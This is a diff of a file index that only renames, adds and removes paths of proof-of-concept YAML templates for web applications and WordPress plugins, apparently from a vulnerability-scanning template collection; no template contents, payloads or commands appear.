./poc/web/sap-web-dispatcher-10078.yaml ./poc/web/sap-web-dispatcher-admin-portal-10069.yaml ./poc/web/sap-web-dispatcher-admin-portal-10070.yaml +./poc/web/sap-web-dispatcher-admin-portal-10071.yaml ./poc/web/sap-web-dispatcher-admin-portal-10072.yaml ./poc/web/sap-web-dispatcher-admin-portal-10073.yaml ./poc/web/sap-web-dispatcher-admin-portal.yaml @@ -96652,7 +96652,7 @@ ./poc/web/simple-custom-website-data-plugin.yaml ./poc/web/simple-custom-website-data.yaml ./poc/web/simsweb.yaml -./poc/web/slack-webhook-11865.yaml +./poc/web/slack-webhook(1).yaml ./poc/web/slack-webhook-token-10315.yaml ./poc/web/slack-webhook.yaml ./poc/web/sma-sunny_webbox.yaml @@ -96661,6 +96661,7 @@ ./poc/web/sophos-utm-web-protection.yaml ./poc/web/sophos-web-appliance.yaml ./poc/web/spark-webui-unauth-10400.yaml +./poc/web/spark-webui-unauth-10401.yaml ./poc/web/spark-webui-unauth-10402.yaml ./poc/web/spark-webui-unauth.yaml ./poc/web/spark-webui-unauth.yml @@ -96746,7 +96747,6 @@ ./poc/web/web-cache-poisoning.yaml ./poc/web/web-config-11123.yaml ./poc/web/web-config-11124.yaml -./poc/web/web-config-11125.yaml ./poc/web/web-config-11126.yaml ./poc/web/web-config-11127.yaml ./poc/web/web-config.yaml @@ -96774,7 +96774,6 @@ ./poc/web/web-file-manager.yaml ./poc/web/web-framework-detect.yaml ./poc/web/web-ftp-detect-11135.yaml -./poc/web/web-ftp-detect-11136.yaml ./poc/web/web-ftp-detect-11137.yaml ./poc/web/web-ftp-detect-11138.yaml ./poc/web/web-instant-messenger-4ae688b6df13f1343923a0c3f1daa933.yaml @@ -96786,8 +96785,8 @@ ./poc/web/web-invoice-568a28d02436de053e0789f1133f8a51.yaml ./poc/web/web-invoice-639321e1bd4c22ce8fd4e6ce306ce3fd.yaml ./poc/web/web-invoice.yaml +./poc/web/web-local-craft-11139.yaml ./poc/web/web-local-craft-11140.yaml -./poc/web/web-local-craft-11141.yaml ./poc/web/web-local-craft.yaml ./poc/web/web-minimalist-200901-c22f0a0c3966959ccbbc8e0bebf65053.yaml ./poc/web/web-minimalist-200901.yaml @@ -96800,7 +96799,7 @@ ./poc/web/web-stories-fc9200f38f324ac4675bb76c80fa16f7.yaml ./poc/web/web-stories.yaml ./poc/web/web-suite-detect-11167.yaml -./poc/web/web-suite-detect.yaml +./poc/web/web-suite-detect-11168.yaml ./poc/web/web-viewer-panel.yaml ./poc/web/web-wiz-rich-text-editor.yaml ./poc/web/web-xml-finder(1).yaml @@ -96843,11 +96842,10 @@ ./poc/web/webcam-2way-videochat-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/web/webcam-2way-videochat-plugin.yaml ./poc/web/webcam-2way-videochat.yaml -./poc/web/webcamxp-5-11122.yaml +./poc/web/webcamxp-5.yaml ./poc/web/webcomco-panel.yaml ./poc/web/webeditors-1.yaml ./poc/web/webeditors-11128.yaml -./poc/web/webeditors-11129.yaml ./poc/web/webeditors-11130.yaml ./poc/web/webeditors-2.yaml ./poc/web/webeditors-3.yaml @@ -96869,8 +96867,8 @@ ./poc/web/weberino-timed-quiz-creator.yaml ./poc/web/webflow-pages-1ea2b2d3f70cdc2bbd228fad03d8cc84.yaml ./poc/web/webflow-pages.yaml -./poc/web/webflow-takeover-11131.yaml ./poc/web/webflow-takeover-11132.yaml +./poc/web/webflow-takeover-11133.yaml ./poc/web/webflow-takeover-11134.yaml ./poc/web/webflow-takeover.yaml ./poc/web/webfolio-31eb77eaefc61e112478e9f1952e822d.yaml @@ -96933,11 +96931,10 @@ ./poc/web/weblogic-ssrf.yaml ./poc/web/weblogic-ssrf.yml ./poc/web/weblogic-t3-detect-11151.yaml -./poc/web/weblogic-t3-detect-11152.yaml +./poc/web/weblogic-t3-detect-11153.yaml ./poc/web/weblogic-t3-detect.yaml ./poc/web/weblogic-t3-search.yaml ./poc/web/weblogic-uddiexplorer.yaml -./poc/web/weblogic-weak-login-11154.yaml ./poc/web/weblogic-weak-login-11155.yaml ./poc/web/weblogic-weak-login-11156.yaml ./poc/web/weblogic-workflow-11157.yaml @@ -96964,9 +96961,9 @@ ./poc/web/webmin-panel.yaml ./poc/web/webmin-workflow.yaml ./poc/web/webmin.yaml +./poc/web/webmodule-ee-11162.yaml ./poc/web/webmodule-ee-11163.yaml -./poc/web/webmodule-ee-11164.yaml -./poc/web/webmodule-ee-panel-11160.yaml +./poc/web/webmodule-ee-panel-11161.yaml ./poc/web/webmodule-ee-panel.yaml ./poc/web/webmodule-ee.yaml ./poc/web/webp-converter-for-media-a33c88596c6b666a69762f624cf7c81b.yaml @@ -97022,21 +97019,21 @@ ./poc/web/webtransfer-client-panel.yaml ./poc/web/webtrees-install.yaml ./poc/web/webtrust-cert.yaml -./poc/web/webui-rce-11170.yaml ./poc/web/webui-rce-11171.yaml ./poc/web/webui-rce-11172.yaml ./poc/web/webui-rce-11173.yaml +./poc/web/webui-rce-11174.yaml ./poc/web/webui-rce.yaml ./poc/web/webuploader.yaml ./poc/web/webuzo-admin-panel.yaml ./poc/web/webuzo-installer.yaml ./poc/web/webview-addjavascript-interface-11175.yaml -./poc/web/webview-addjavascript-interface-11177.yaml +./poc/web/webview-addjavascript-interface-11176.yaml ./poc/web/webview-addjavascript-interface.yaml ./poc/web/webview-javascript-11178.yaml ./poc/web/webview-javascript.yaml +./poc/web/webview-load-url-11180.yaml ./poc/web/webview-load-url-11181.yaml -./poc/web/webview-load-url-11182.yaml ./poc/web/webview-load-url.yaml ./poc/web/webview-universal-access-11183.yaml ./poc/web/webview-universal-access-11185.yaml @@ -97068,7 +97065,6 @@ ./poc/web/xp-webcam-11696.yaml ./poc/web/xp-webcam-11697.yaml ./poc/web/xp-webcam-11699.yaml -./poc/web/xp-webcam.yaml ./poc/web/xweb500-panel.yaml ./poc/web/yonyou-nc-ncfindweb-directory-traversal.yaml ./poc/web/yonyou-u9-umwebservice-fileread.yaml @@ -97267,7 +97263,6 @@ ./poc/wordpress/alfacgiapi-wordpress-257.yaml ./poc/wordpress/alfacgiapi-wordpress-3.yaml ./poc/wordpress/alfacgiapi-wordpress-4.yaml -./poc/wordpress/alfacgiapi-wordpress.yaml ./poc/wordpress/all-in-one-wp-migration-08b487f085e8087c59e905026c1c075f.yaml ./poc/wordpress/all-in-one-wp-migration-1650269cab833c79cc04147ad34dbaad.yaml ./poc/wordpress/all-in-one-wp-migration-23b0a34f39e5c93f169108f329b1e3c9.yaml @@ -97690,7 +97685,7 @@ ./poc/wordpress/easy-wp-smtp-e105c23e6058137711e2a12fec6f051e.yaml ./poc/wordpress/easy-wp-smtp-listing-7154.yaml ./poc/wordpress/easy-wp-smtp-listing-7155.yaml -./poc/wordpress/easy-wp-smtp-listing-7157.yaml +./poc/wordpress/easy-wp-smtp-listing-7156.yaml ./poc/wordpress/easy-wp-smtp-listing.yaml ./poc/wordpress/easy-wp-smtp.yaml ./poc/wordpress/easyrotator-for-wordpress-0184078b79ad95363b9f16489d7e6821.yaml @@ -97758,6 +97753,7 @@ ./poc/wordpress/feedwordpress-db142dc7dc2479e241016bfec90b9659.yaml ./poc/wordpress/feedwordpress-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/feedwordpress-plugin.yaml +./poc/wordpress/feedwordpress-xss-7459.yaml ./poc/wordpress/feedwordpress-xss-7460.yaml ./poc/wordpress/feedwordpress-xss.yaml ./poc/wordpress/feedwordpress.yaml @@ -98366,7 +98362,6 @@ ./poc/wordpress/n-media-wp-simple-quiz.yaml ./poc/wordpress/nativechurch-wp-theme-lfd-8999.yaml ./poc/wordpress/nativechurch-wp-theme-lfd-9000.yaml -./poc/wordpress/nativechurch-wp-theme-lfd-9001.yaml ./poc/wordpress/nativechurch-wp-theme-lfd-9002.yaml ./poc/wordpress/nativechurch-wp-theme-lfd-9003.yaml ./poc/wordpress/nex-forms-express-wp-form-builder-03800489aeb5ec718d025ca048ebef5f.yaml @@ -98714,7 +98709,6 @@ ./poc/wordpress/transposh-translation-filter-for-wordpress.yaml ./poc/wordpress/triberr-wordpress-plugin-a366a26580883f88c953f87f94a969cb.yaml ./poc/wordpress/triberr-wordpress-plugin.yaml -./poc/wordpress/trilithic-viewpoint-default-10835.yaml ./poc/wordpress/trilithic-viewpoint-default-10836.yaml ./poc/wordpress/trilithic-viewpoint-default-password.yaml ./poc/wordpress/trilithic-viewpoint-default.yaml @@ -98761,7 +98755,6 @@ ./poc/wordpress/viewpoint-system-status-11016.yaml ./poc/wordpress/viewpoint-system-status-11017.yaml ./poc/wordpress/viewpoint-system-status-11018.yaml -./poc/wordpress/viewpoint-system-status-11019.yaml ./poc/wordpress/viewpoint-system-status.yaml ./poc/wordpress/views-for-wpforms-lite-3242a9557ef1bd82e6212d9b01c1527e.yaml ./poc/wordpress/views-for-wpforms-lite-9616fb3bedf6e4ae461ce40dedf17ff9.yaml @@ -99041,7 +99034,6 @@ ./poc/wordpress/wordpress-accessible-wpconfig-10.yaml ./poc/wordpress/wordpress-accessible-wpconfig-11.yaml ./poc/wordpress/wordpress-accessible-wpconfig-11234.yaml -./poc/wordpress/wordpress-accessible-wpconfig-11235.yaml ./poc/wordpress/wordpress-accessible-wpconfig-11237.yaml ./poc/wordpress/wordpress-accessible-wpconfig-11238.yaml ./poc/wordpress/wordpress-accessible-wpconfig-11239.yaml @@ -99072,8 +99064,8 @@ ./poc/wordpress/wordpress-ae44f6a1ec4312db054e74e48af20717.yaml ./poc/wordpress/wordpress-af2937e1967165caa42cd4ad64300421.yaml ./poc/wordpress/wordpress-afad16faf36b64e536b10247898859bf.yaml -./poc/wordpress/wordpress-affiliatewp-log-11240.yaml ./poc/wordpress/wordpress-affiliatewp-log-11241.yaml +./poc/wordpress/wordpress-affiliatewp-log-11242.yaml ./poc/wordpress/wordpress-affiliatewp-log-11243.yaml ./poc/wordpress/wordpress-affiliatewp-log-11244.yaml ./poc/wordpress/wordpress-affiliatewp-log.yaml @@ -99108,6 +99100,7 @@ ./poc/wordpress/wordpress-bbe7d5752179155e1a73c493a9edc901.yaml ./poc/wordpress/wordpress-bbpress-plugin-listing-11245.yaml ./poc/wordpress/wordpress-bbpress-plugin-listing-11246.yaml +./poc/wordpress/wordpress-bbpress-plugin-listing.yaml ./poc/wordpress/wordpress-bc11188030c5ef34e44564c173b85b3b.yaml ./poc/wordpress/wordpress-bcae5ef6c0a4aa3c431c36626afbf967.yaml ./poc/wordpress/wordpress-bcee80614ad35036078b4b38fac65ba7.yaml @@ -99191,6 +99184,7 @@ ./poc/wordpress/wordpress-db-backup-listing-11250.yaml ./poc/wordpress/wordpress-db-backup-listing.yaml ./poc/wordpress/wordpress-db-backup.yaml +./poc/wordpress/wordpress-db-repair-11252.yaml ./poc/wordpress/wordpress-db-repair-11253.yaml ./poc/wordpress/wordpress-db-repair-11254.yaml ./poc/wordpress/wordpress-db-repair-11255.yaml @@ -99202,9 +99196,9 @@ ./poc/wordpress/wordpress-de03b87f4ceb36bcd460178f68d510a8.yaml ./poc/wordpress/wordpress-debug-log-11256.yaml ./poc/wordpress/wordpress-debug-log-11257.yaml -./poc/wordpress/wordpress-debug-log-11258.yaml +./poc/wordpress/wordpress-debug-log-11259.yaml ./poc/wordpress/wordpress-debug-log.yaml -./poc/wordpress/wordpress-detect-11261.yaml +./poc/wordpress/wordpress-detect-11260.yaml ./poc/wordpress/wordpress-detect.yaml ./poc/wordpress/wordpress-detect2.yaml ./poc/wordpress/wordpress-directory-listing-1.yaml @@ -99257,9 +99251,9 @@ ./poc/wordpress/wordpress-emails-verification-for-woocommerce-11271.yaml ./poc/wordpress/wordpress-emails-verification-for-woocommerce-2.yaml ./poc/wordpress/wordpress-emails-verification-for-woocommerce.yaml -./poc/wordpress/wordpress-emergency-script-11272.yaml ./poc/wordpress/wordpress-emergency-script-11273.yaml ./poc/wordpress/wordpress-emergency-script-11274.yaml +./poc/wordpress/wordpress-emergency-script-11275.yaml ./poc/wordpress/wordpress-emergency-script-11276.yaml ./poc/wordpress/wordpress-emergency-script-11277.yaml ./poc/wordpress/wordpress-emergency-script.yaml @@ -99326,15 +99320,12 @@ ./poc/wordpress/wordpress-gdpr-7c5c53c8eaf2ec27b04a769490da718e.yaml ./poc/wordpress/wordpress-gdpr.yaml ./poc/wordpress/wordpress-git-config-1.yaml -./poc/wordpress/wordpress-git-config-11278.yaml ./poc/wordpress/wordpress-git-config-11279.yaml ./poc/wordpress/wordpress-git-config-2.yaml -./poc/wordpress/wordpress-gotmls-detect-11280.yaml ./poc/wordpress/wordpress-gotmls-detect-11281.yaml ./poc/wordpress/wordpress-gotmls-detect.yaml +./poc/wordpress/wordpress-gtranslate-plugin-listing-11282.yaml ./poc/wordpress/wordpress-gtranslate-plugin-listing-11283.yaml -./poc/wordpress/wordpress-gtranslate-plugin-listing-11284.yaml -./poc/wordpress/wordpress-gtranslate-plugin-listing.yaml ./poc/wordpress/wordpress-https-4a61ef799fd66b2a49253a5892d07d5e.yaml ./poc/wordpress/wordpress-https-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wordpress-https-fc212cc7eec653319494b488cc7fe53d.yaml @@ -99345,19 +99336,17 @@ ./poc/wordpress/wordpress-infinitewp-auth-bypass-11285.yaml ./poc/wordpress/wordpress-infinitewp-auth-bypass-11286.yaml ./poc/wordpress/wordpress-infinitewp-auth-bypass-11287.yaml -./poc/wordpress/wordpress-infinitewp-auth-bypass-11288.yaml ./poc/wordpress/wordpress-infinitewp-auth-bypass-11289.yaml ./poc/wordpress/wordpress-infinitewp-auth-bypass.yaml ./poc/wordpress/wordpress-instagram-feed-c6f7df5b11c5d64e4d637b8f3456595f.yaml ./poc/wordpress/wordpress-instagram-feed.yaml ./poc/wordpress/wordpress-install.yaml -./poc/wordpress/wordpress-installer-log-11290.yaml ./poc/wordpress/wordpress-installer-log-11291.yaml +./poc/wordpress/wordpress-installer-log-11292.yaml ./poc/wordpress/wordpress-installer-log.yaml ./poc/wordpress/wordpress-js.yaml ./poc/wordpress/wordpress-language-7a04dfac5ff879ee9a27e2783540d3cb.yaml ./poc/wordpress/wordpress-language.yaml -./poc/wordpress/wordpress-lfi.yaml ./poc/wordpress/wordpress-login-11293.yaml ./poc/wordpress/wordpress-login-11294.yaml ./poc/wordpress/wordpress-login.yaml @@ -99421,9 +99410,8 @@ ./poc/wordpress/wordpress-rdf-user-enum-11305.yaml ./poc/wordpress/wordpress-rdf-user-enum.yaml ./poc/wordpress/wordpress-readme-file.yaml -./poc/wordpress/wordpress-redirection-plugin-listing-11306.yaml ./poc/wordpress/wordpress-redirection-plugin-listing-11307.yaml -./poc/wordpress/wordpress-redirection-plugin-listing.yaml +./poc/wordpress/wordpress-redirection-plugin-listing-11308.yaml ./poc/wordpress/wordpress-registration-enabled.yaml ./poc/wordpress/wordpress-rest-api.yaml ./poc/wordpress/wordpress-sensitive-config.yaml @@ -99495,11 +99483,12 @@ ./poc/wordpress/wordpress-tabs-slides.yaml ./poc/wordpress/wordpress-takeover-11310.yaml ./poc/wordpress/wordpress-takeover-11311.yaml -./poc/wordpress/wordpress-takeover-11313.yaml +./poc/wordpress/wordpress-takeover-11312.yaml ./poc/wordpress/wordpress-takeover-11314.yaml ./poc/wordpress/wordpress-takeover.yaml ./poc/wordpress/wordpress-theme-travelscape-1-0-3-arbitrary-file-upload.yaml ./poc/wordpress/wordpress-themes-detect-11315.yaml +./poc/wordpress/wordpress-themes-detect-11316.yaml ./poc/wordpress/wordpress-themes-detect.yaml ./poc/wordpress/wordpress-themes2.yaml ./poc/wordpress/wordpress-tmm-db-migrate-11318.yaml @@ -99512,8 +99501,8 @@ ./poc/wordpress/wordpress-tooltips-bb1c0eb45ddcceab250cf6c792889f44.yaml ./poc/wordpress/wordpress-tooltips-fa55ee3725a206bca8373dd20c9f75b0.yaml ./poc/wordpress/wordpress-tooltips.yaml -./poc/wordpress/wordpress-total-upkeep-backup-download-11322.yaml ./poc/wordpress/wordpress-total-upkeep-backup-download-11323.yaml +./poc/wordpress/wordpress-total-upkeep-backup-download-11324.yaml ./poc/wordpress/wordpress-total-upkeep-backup-download.yaml ./poc/wordpress/wordpress-twitterbot-d36dd4bc6c1a3d5b4f0aafd5b7b723c5.yaml ./poc/wordpress/wordpress-twitterbot.yaml @@ -99534,61 +99523,58 @@ ./poc/wordpress/wordpress-users.yaml ./poc/wordpress/wordpress-weak-credentials-11334.yaml ./poc/wordpress/wordpress-weak-credentials-11335.yaml -./poc/wordpress/wordpress-weak-credentials-11337.yaml +./poc/wordpress/wordpress-weak-credentials-11336.yaml ./poc/wordpress/wordpress-weak-credentials.yaml ./poc/wordpress/wordpress-website-detect.yaml ./poc/wordpress/wordpress-whois-search-15d0f2f1bcb62f9575544a5207b1af33.yaml ./poc/wordpress/wordpress-whois-search-1f912223cd5db03abd6e32e02ba54028.yaml ./poc/wordpress/wordpress-whois-search.yaml ./poc/wordpress/wordpress-woocommerce-listing-11338.yaml -./poc/wordpress/wordpress-woocommerce-listing-11339.yaml ./poc/wordpress/wordpress-woocommerce-listing-11340.yaml +./poc/wordpress/wordpress-woocommerce-listing-11341.yaml ./poc/wordpress/wordpress-woocommerce-sqli-1.yaml ./poc/wordpress/wordpress-woocommerce-sqli-11342.yaml ./poc/wordpress/wordpress-woocommerce-sqli-11343.yaml ./poc/wordpress/wordpress-woocommerce-sqli-11344.yaml -./poc/wordpress/wordpress-woocommerce-sqli-11345.yaml ./poc/wordpress/wordpress-woocommerce-sqli-2.yaml ./poc/wordpress/wordpress-woocommerce-sqli.yaml -./poc/wordpress/wordpress-woosidebars.yaml +./poc/wordpress/wordpress-wordfence-lfi-11346.yaml ./poc/wordpress/wordpress-wordfence-lfi-11347.yaml ./poc/wordpress/wordpress-wordfence-lfi-11348.yaml ./poc/wordpress/wordpress-wordfence-lfi-11349.yaml -./poc/wordpress/wordpress-wordfence-lfi-11350.yaml ./poc/wordpress/wordpress-wordfence-lfi-11351.yaml ./poc/wordpress/wordpress-wordfence-lfi-11352.yaml ./poc/wordpress/wordpress-wordfence-waf-bypass-xss-11353.yaml ./poc/wordpress/wordpress-wordfence-waf-bypass-xss-11354.yaml ./poc/wordpress/wordpress-wordfence-waf-bypass-xss-11355.yaml -./poc/wordpress/wordpress-wordfence-waf-bypass-xss-11356.yaml ./poc/wordpress/wordpress-wordfence-xss-11357.yaml ./poc/wordpress/wordpress-wordfence-xss-11358.yaml ./poc/wordpress/wordpress-wordfence-xss-11359.yaml ./poc/wordpress/wordpress-wordfence-xss-11361.yaml ./poc/wordpress/wordpress-wordfence-xss-11362.yaml ./poc/wordpress/wordpress-wordfence-xss.yaml -./poc/wordpress/wordpress-workflow-11363.yaml ./poc/wordpress/wordpress-workflow-11364.yaml +./poc/wordpress/wordpress-workflow-11365.yaml ./poc/wordpress/wordpress-workflow-11366.yaml ./poc/wordpress/wordpress-workflow.yaml ./poc/wordpress/wordpress-wp-config-exposure.yml ./poc/wordpress/wordpress-wpconfig-inclosure.yaml ./poc/wordpress/wordpress-wpcourses-info-disclosure-11367.yaml ./poc/wordpress/wordpress-wpcourses-info-disclosure-11368.yaml +./poc/wordpress/wordpress-wpcourses-info-disclosure-11369.yaml ./poc/wordpress/wordpress-wpcourses-info-disclosure-11370.yaml -./poc/wordpress/wordpress-wpcourses-info-disclosure-11371.yaml ./poc/wordpress/wordpress-wpcourses-info-disclosure.yaml ./poc/wordpress/wordpress-xmlrpc-brute-force.yaml ./poc/wordpress/wordpress-xmlrpc-bruteforce.yaml ./poc/wordpress/wordpress-xmlrpc-enabled.yaml -./poc/wordpress/wordpress-xmlrpc-listmethods-11372.yaml ./poc/wordpress/wordpress-xmlrpc-listmethods-11373.yaml -./poc/wordpress/wordpress-xmlrpc-listmethods.yaml +./poc/wordpress/wordpress-xmlrpc-listmethods-11374.yaml ./poc/wordpress/wordpress-zebra-form-xss-11375.yaml ./poc/wordpress/wordpress-zebra-form-xss-11376.yaml ./poc/wordpress/wordpress-zebra-form-xss-11377.yaml -./poc/wordpress/wordpress-zebra-form-xss-11378.yaml +./poc/wordpress/wordpress-zebra-form-xss-11379.yaml ./poc/wordpress/wordpress-zebra-form-xss.yaml +./poc/wordpress/wordpress.yaml ./poc/wordpress/wordpressConfig.yaml ./poc/wordpress/wordpress_SSRF_Qards (1).yaml ./poc/wordpress/wordpress_bricks_builder_rce_cve_2024_25600.yaml @@ -99779,6 +99765,7 @@ ./poc/wordpress/wp-amasin-the-amazon-affiliate-shop.yaml ./poc/wordpress/wp-amazon-shop-90e615477738db895ced16515c910b83.yaml ./poc/wordpress/wp-amazon-shop.yaml +./poc/wordpress/wp-ambience-xss-11407.yaml ./poc/wordpress/wp-ambience-xss-11409.yaml ./poc/wordpress/wp-ambience-xss-11410.yaml ./poc/wordpress/wp-ambience-xss.yaml @@ -99826,6 +99813,7 @@ ./poc/wordpress/wp-appointment-schedule-booking-system.yaml ./poc/wordpress/wp-appointments-schedules-18c89d6aa69e1599fc784ae097e34287.yaml ./poc/wordpress/wp-appointments-schedules.yaml +./poc/wordpress/wp-arforms-listing-11415.yaml ./poc/wordpress/wp-arforms-listing-11416.yaml ./poc/wordpress/wp-arforms-listing-11417.yaml ./poc/wordpress/wp-arforms-listing-11418.yaml @@ -100141,8 +100129,8 @@ ./poc/wordpress/wp-code-highlightjs-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wp-code-highlightjs-plugin.yaml ./poc/wordpress/wp-code-highlightjs.yaml -./poc/wordpress/wp-code-snippets-xss-11425.yaml ./poc/wordpress/wp-code-snippets-xss-11426.yaml +./poc/wordpress/wp-code-snippets-xss.yaml ./poc/wordpress/wp-codemirror-block-00c8945b2d90aba47cb8e8cc192bdf4e.yaml ./poc/wordpress/wp-codemirror-block.yaml ./poc/wordpress/wp-coder-132985a8b76990e0c6cd6695eb596f6c.yaml @@ -100343,7 +100331,7 @@ ./poc/wordpress/wp-custom-post-template.yaml ./poc/wordpress/wp-custom-tables-xss-11431.yaml ./poc/wordpress/wp-custom-tables-xss-11432.yaml -./poc/wordpress/wp-custom-tables-xss-11434.yaml +./poc/wordpress/wp-custom-tables-xss-11433.yaml ./poc/wordpress/wp-custom-tables-xss-11435.yaml ./poc/wordpress/wp-custom-tables-xss.yaml ./poc/wordpress/wp-custom-widget-area-1ea5db37756be1000588b9e7abbeedc9.yaml @@ -100692,7 +100680,6 @@ ./poc/wordpress/wp-email-subscribers-listing-11440.yaml ./poc/wordpress/wp-email-subscribers-listing-11441.yaml ./poc/wordpress/wp-email-subscribers-listing-11443.yaml -./poc/wordpress/wp-email-subscribers-listing.yaml ./poc/wordpress/wp-email-template-1729a8753eae476fa81f29fbf915eae7.yaml ./poc/wordpress/wp-email-template-77ad67534972b8073fe68dc3e6a0ae34.yaml ./poc/wordpress/wp-email-template-9ceea61553b1440c884786aa4c073642.yaml @@ -100969,7 +100956,6 @@ ./poc/wordpress/wp-filemanager.yaml ./poc/wordpress/wp-film-studio-49f13dc6fa66760ca1ff6d5f40c3291d.yaml ./poc/wordpress/wp-film-studio.yaml -./poc/wordpress/wp-finder-xss-11445.yaml ./poc/wordpress/wp-finder-xss-11447.yaml ./poc/wordpress/wp-finder-xss-11448.yaml ./poc/wordpress/wp-finder-xss-11449.yaml @@ -101007,6 +100993,7 @@ ./poc/wordpress/wp-footnotes.yaml ./poc/wordpress/wp-force-ssl-535af98dd21b180aed9353b26ab61bf4.yaml ./poc/wordpress/wp-force-ssl-8016151e9aade43a962c06ab9c46dfaf.yaml +./poc/wordpress/wp-force-ssl.yaml ./poc/wordpress/wp-forecast-8095a25d926aef6f4d242637d15ae9bf.yaml ./poc/wordpress/wp-forecast-bbfafd2718458509e63452a3085f34b5.yaml ./poc/wordpress/wp-forecast.yaml @@ -101052,8 +101039,8 @@ ./poc/wordpress/wp-front-end-repository.yaml ./poc/wordpress/wp-full-auto-tags-manager-4c934eda242d0419e3e635b91ae55277.yaml ./poc/wordpress/wp-full-auto-tags-manager.yaml +./poc/wordpress/wp-full-path-disclosure-11455.yaml ./poc/wordpress/wp-full-path-disclosure-11456.yaml -./poc/wordpress/wp-full-path-disclosure-11457.yaml ./poc/wordpress/wp-full-path-disclosure.yaml ./poc/wordpress/wp-full-stripe-free-080a5561255af98399eb27da1263ccaf.yaml ./poc/wordpress/wp-full-stripe-free-880466ddc7fd0af03d20a07473dd287e.yaml @@ -101200,14 +101187,14 @@ ./poc/wordpress/wp-gravity-forms-spreadsheets-ce51e508f7b3ae4fa3cfc0e4f02b85ff.yaml ./poc/wordpress/wp-gravity-forms-spreadsheets-e2b56e01ba06c66b8d53d40581b73ce6.yaml ./poc/wordpress/wp-gravity-forms-spreadsheets.yaml +./poc/wordpress/wp-grimag-open-redirect-11458.yaml ./poc/wordpress/wp-grimag-open-redirect-11459.yaml ./poc/wordpress/wp-grimag-open-redirect-11460.yaml ./poc/wordpress/wp-grimag-open-redirect-11461.yaml ./poc/wordpress/wp-grimag-open-redirect-11462.yaml +./poc/wordpress/wp-gtranslate-open-redirect-11463.yaml ./poc/wordpress/wp-gtranslate-open-redirect-11464.yaml -./poc/wordpress/wp-gtranslate-open-redirect-11465.yaml ./poc/wordpress/wp-gtranslate-open-redirect-11466.yaml -./poc/wordpress/wp-gtranslate-open-redirect.yaml ./poc/wordpress/wp-guestmap-138b91374da611e5609255da3727b885.yaml ./poc/wordpress/wp-guestmap.yaml ./poc/wordpress/wp-guppy-c55927dc6402e6af39078d4c3378b5b6.yaml @@ -101360,9 +101347,10 @@ ./poc/wordpress/wp-insert.yaml ./poc/wordpress/wp-instagram-bank-a759e03a3140ab5da9f810ffbdb3a4c2.yaml ./poc/wordpress/wp-instagram-bank.yaml +./poc/wordpress/wp-install-11473.yaml ./poc/wordpress/wp-install-11474.yaml -./poc/wordpress/wp-install-11475.yaml ./poc/wordpress/wp-install-php.yaml +./poc/wordpress/wp-install.yaml ./poc/wordpress/wp-instance-rename-f54408534e740536e4255c5420540815.yaml ./poc/wordpress/wp-instance-rename.yaml ./poc/wordpress/wp-insurance-d6bda609865d6ab618b4f735cbea39bb.yaml @@ -101395,7 +101383,7 @@ ./poc/wordpress/wp-iwp-client-listing-11479.yaml ./poc/wordpress/wp-javospot-lfi-11480.yaml ./poc/wordpress/wp-javospot-lfi-11481.yaml -./poc/wordpress/wp-javospot-lfi.yaml +./poc/wordpress/wp-javospot-lfi-11482.yaml ./poc/wordpress/wp-javospot-premium-theme-lfi.yaml ./poc/wordpress/wp-jitsi-shortcodes-7170b6ccdadf79ce812cf8db156d523a.yaml ./poc/wordpress/wp-jitsi-shortcodes-ae288d2fafe96b20fe651a633ad8ef11.yaml @@ -101501,7 +101489,7 @@ ./poc/wordpress/wp-knews-xss-11484.yaml ./poc/wordpress/wp-knews-xss-11485.yaml ./poc/wordpress/wp-knews-xss-11486.yaml -./poc/wordpress/wp-knews-xss-11487.yaml +./poc/wordpress/wp-knews-xss-11488.yaml ./poc/wordpress/wp-knews-xss.yaml ./poc/wordpress/wp-knowledgebase-ce12311920213990a4e4a36be60be911.yaml ./poc/wordpress/wp-knowledgebase.yaml @@ -101806,6 +101794,7 @@ ./poc/wordpress/wp-memory-plugin.yaml ./poc/wordpress/wp-memory.yaml ./poc/wordpress/wp-memphis-documents-library-lfi-1.yaml +./poc/wordpress/wp-memphis-documents-library-lfi-11495.yaml ./poc/wordpress/wp-memphis-documents-library-lfi-11496.yaml ./poc/wordpress/wp-memphis-documents-library-lfi-11497.yaml ./poc/wordpress/wp-memphis-documents-library-lfi-11498.yaml @@ -101917,6 +101906,7 @@ ./poc/wordpress/wp-mpdf-2c78393e91f992fef96c27f7c515219b.yaml ./poc/wordpress/wp-mpdf-95b1d86b0d9172f70e27dd5cdd6025a1.yaml ./poc/wordpress/wp-mpdf.yaml +./poc/wordpress/wp-mstore-plugin-listing-11500.yaml ./poc/wordpress/wp-mstore-plugin-listing-11501.yaml ./poc/wordpress/wp-mui-mass-user-input-a8af40a859ef12017793ca809201c2d2.yaml ./poc/wordpress/wp-mui-mass-user-input-b32a81e6becbfc443d59541b147d668c.yaml @@ -101932,6 +101922,7 @@ ./poc/wordpress/wp-multiple-theme-ssrf-11510.yaml ./poc/wordpress/wp-multiple-theme-ssrf-11511.yaml ./poc/wordpress/wp-multiple-theme-ssrf-11512.yaml +./poc/wordpress/wp-multiple-theme-ssrf-11513.yaml ./poc/wordpress/wp-multisite-content-copier-02469035e949992a5abfd04fc61ddbad.yaml ./poc/wordpress/wp-multisite-content-copier-9f591f88f9aee0030295b5c3d28f9149.yaml ./poc/wordpress/wp-multisite-content-copier-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -102116,7 +102107,6 @@ ./poc/wordpress/wp-photo-text-slider-50.yaml ./poc/wordpress/wp-php-widget-e27de43f3c3dd5df388335d72559f433.yaml ./poc/wordpress/wp-php-widget.yaml -./poc/wordpress/wp-phpfreechat-xss-11524.yaml ./poc/wordpress/wp-phpfreechat-xss-11526.yaml ./poc/wordpress/wp-phpfreechat-xss-11527.yaml ./poc/wordpress/wp-phpfreechat-xss-11528.yaml @@ -102160,9 +102150,10 @@ ./poc/wordpress/wp-plotly-75c21e80d525814876b411270547e062.yaml ./poc/wordpress/wp-plotly.yaml ./poc/wordpress/wp-plugin-1-flashgallery-listing-1.yaml -./poc/wordpress/wp-plugin-1-flashgallery-listing-11531.yaml +./poc/wordpress/wp-plugin-1-flashgallery-listing-11530.yaml ./poc/wordpress/wp-plugin-1-flashgallery-listing-11532.yaml ./poc/wordpress/wp-plugin-1-flashgallery-listing-2.yaml +./poc/wordpress/wp-plugin-1-flashgallery-listing.yaml 